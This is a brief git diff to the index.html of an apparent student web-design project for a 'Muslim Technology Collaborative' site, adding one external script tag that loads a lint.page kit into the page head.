--- a/itis3135/mtc_client/index.html
+++ b/itis3135/mtc_client/index.html
@@ -5,6 +5,7 @@
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>Muslim Technology Collaborative | Home</title>
   <link rel="stylesheet" href="style.css">
+  <script src="https://lint.page/kit/4d0fe3.js" crossorigin="anonymous"></script>
 </head>
 <body>
   <header>
